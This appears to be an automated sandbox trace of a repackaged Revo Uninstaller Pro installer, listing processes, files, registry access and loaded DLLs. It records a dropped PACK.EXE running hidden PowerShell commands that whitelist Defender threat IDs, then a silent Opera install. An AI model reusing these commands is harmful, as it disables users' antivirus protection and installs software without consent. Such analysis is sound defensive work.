Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File created: C:\Users\user\AppData\Local\Temp\nsn5EB7.tmp
Source: Yara match File source: 10.0.ruplp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Command line argument: sfxname (16_2_00FECBB8)
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Command line argument: sfxstime (16_2_00FECBB8)
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Command line argument: STARTDLG (16_2_00FECBB8)
Source: Revo.Uninstaller.Pro.v5.3.4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File read: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
Source: unknown Process created: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
Source: C:\Windows\System32\runonce.exe Process created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Process created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
Source: C:\Users\user\Downloads\OperaSetup.exe Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=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
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe Process created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe Process created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: windows.fileexplorer.common.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: linkinfo.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntshrui.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cscapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\runonce.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\grpconv.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\grpconv.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: msi.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\regsvr32.exe | Section loaded: wldp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: apphelp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wininet.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wtsapi32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msimg32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: uxtheme.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oledlg.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: urlmon.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: rstrtmgr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: version.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oleacc.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winmm.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iertutil.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: srvcli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: netutils.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ncrypt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ntasn1.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msasn1.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dwmapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: sspicli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winsta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windows.storage.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wldp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windowscodecs.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched20.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: usp10.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msls31.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: profapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: apphelp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: version.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: mpr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: olepro32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: wininet.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: wsock32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: winmm.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: oleacc.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: usp10.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: uxtheme.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: kernel.appcore.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: wtsapi32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: winsta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: windows.storage.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: wldp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: propsys.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: profapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | Section loaded: sxs.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wininet.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wtsapi32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msimg32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: uxtheme.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oledlg.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: urlmon.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: rstrtmgr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: version.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oleacc.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winmm.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iertutil.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: srvcli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: netutils.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ncrypt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iphlpapi.dll
